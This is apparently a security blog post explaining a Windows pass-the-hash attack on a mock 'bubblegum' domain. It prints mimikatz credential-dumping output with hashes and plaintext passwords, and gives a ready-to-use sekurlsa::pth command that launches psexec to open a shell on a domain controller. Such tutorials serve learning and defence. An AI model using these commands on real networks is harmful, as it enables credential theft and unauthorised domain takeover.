In my opinion, it's alot of hype. Anyone, can be an APT. You don't need to be state sponsored to launch an attack or infiltrate corporate systems. All you need is a good Internet connection and the willingness to learn and explore. I always said, even a 16 year old can be a hacker. The thing that differentiates a state sponsored attacker and a kid are his motivations. State sponsored hackers are also assumed to have deeper pockets, so having 0-day exploits in your arsenal is a definite advantage. Anyway, I'll leave this argument for another post. For this entry, I will talk about Windows credential attack.
The scenario will be post exploitation. Meaning, after the attacker has gained administrative privilege of a host in your organization. Next move will be to gain further access into the network. In a typical Windows environment, most PCs will be authenticated via AD (Active Directory) in a Domain Controller(DC), the Kerberos auth protocol is used to assign a validation ticket to the authenticated host. With this ticket, the host will be able to access other authenticated hosts in the same domain. The hashes and tickets can be reused by calling it directly from the host memory, disk or in some cases, the DC directly. There have been various articles about abusing Windows credentials namely Kerberos, my post will focus on passing the hash. Maybe in my next article we can also talk about abusing Kerberos and creating golden tickets.
The NTLM hashes are encryted in memory. A common technique used is to pass the hash(pth) over to the other hos but mimikatz does a great job at using a built in MS API to decrypt these hashes.
Lets say super duper hacker has gain admin rights on Betty's PC and her PC happen to be part of the bubblegum domain. She happens to be the domain admin for co bubblegum.com. How convenient ;) For simplicity, we assume that Betty's PC was already breached and the attacker has local admin privilege. We'll upload mimikatz. There are also various tools that can call mimikatz functions so you don't necessary have to use mimikatz because some AVs flag mimikatz. So, if you are using metasploit, the metepreter session can invoke mimikatz functions, if you are also keen on powershells, there's even powerSploit scripts to invoke mimikatz functions.
For this example I am keeping it simple.We are just going to dump the encrypted hashes and pth it to the DC using psexec.
Dumping Hashes
1. Running mimikatz, check your privilege, you must have admin privilege on the host:
2. Dump the hashes in mem by running 'sekurlsa::logonpasswords. You should see all passwd hashes in mem, even decrypted ones!
Authentication Id : 0 ; 1192637 (00000000:001232bd)
Session : Interactive from 3
User Name : Administrator
Domain : WIN
Logon Server : WIN
Logon Time : 11/25/2017 2:54:07 PM
SID : S-1-5-21-185860677-232557259-2993331253-500
msv :
[00010000] CredentialKeys
* NTLM : 9213b0c8fd855c4ec0267f303a376f31
* SHA1 : 749b4dae3da83473b0491e9fab0bf151c932374a
[00000003] Primary
* Username : Administrator
* Domain : WIN
* NTLM : 9213b0c8fd855c4ec0267f303a376f31
* SHA1 : 749b4dae3da83473b0491e9fab0bf151c932374a
tspkg :
wdigest :
* Username : Administrator
* Domain : WIN
* Password : !qwerty123
kerberos :
* Username : Administrator
* Domain : WIN
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 1505847 (00000000:0016fa37)
Session : Interactive from 1
User Name : betty
Domain : BUBBLEGUM
Logon Server : WINDC01
Logon Time : 11/25/2017 3:14:56 PM
SID : S-1-5-21-185860677-232557259-2993331253-1000
msv :
[00000003] Primary
* Username : betty
* Domain : BUBBLEGUM
* NTLM : 9213b0c8fd855c4ec0267f303a376f31
* SHA1 : 749b4dae3da83473b0491e9fab0bf151c932374a
[00010000] CredentialKeys
* NTLM : 9213b0c8fd855c4ec0267f303a376f31
* SHA1 : 749b4dae3da83473b0491e9fab0bf151c932374a
tspkg :
wdigest :
* Username : betty
* Domain : BUBBLEGUM
* Password : !kldsljds
kerberos :
* Username : betty
* Domain : BUBBLEGUM.COM
* Password : (null)
ssp :
credman :
<snip-------snip>
The above output shows 2 credentials, administrator and betty. Notice that the administrator domain is WIN and betty belongs to bubblegum.com. Our target is the bugglegum.com domain, and we happen to obtain the passwd in plain text!
Passing the Hash
3. We would now like to pass the hash using betty's credentials using pth function built into mimikatz, if you see another cmd.exe prompt pop up, it means the credentials worked!
4. Now, let's try to pass this hash to the DC server from Betty's PC. I simply pass the hash dump from her PC to the DC. Remember, you'll need psexec.exe on Betty's PC. This can be downloaded from MS website, here. The command I issue on Betty's machine using mimikatz is:
sekurlsa::pth /user:betty /domain:bubblegum /ntlm:9213b0c8fd855c4ec0267f303a376f31 /run:".\psexec64.exe \\10.0.0.1 -h cmd.exe"
If the cmd.exe successfully executes, you should see a second prompt! Sometimes, this takes a while for psexec to spawn cmd.exe so be patient.
Notice that psexec64.exe has executed cmd.exe and hostname and whoami cmds show that you are now on the DC as Betty. In my next article, I will cover how to dump the DC credentials and creating the golden ticket ;-)
Stay tuned folks!
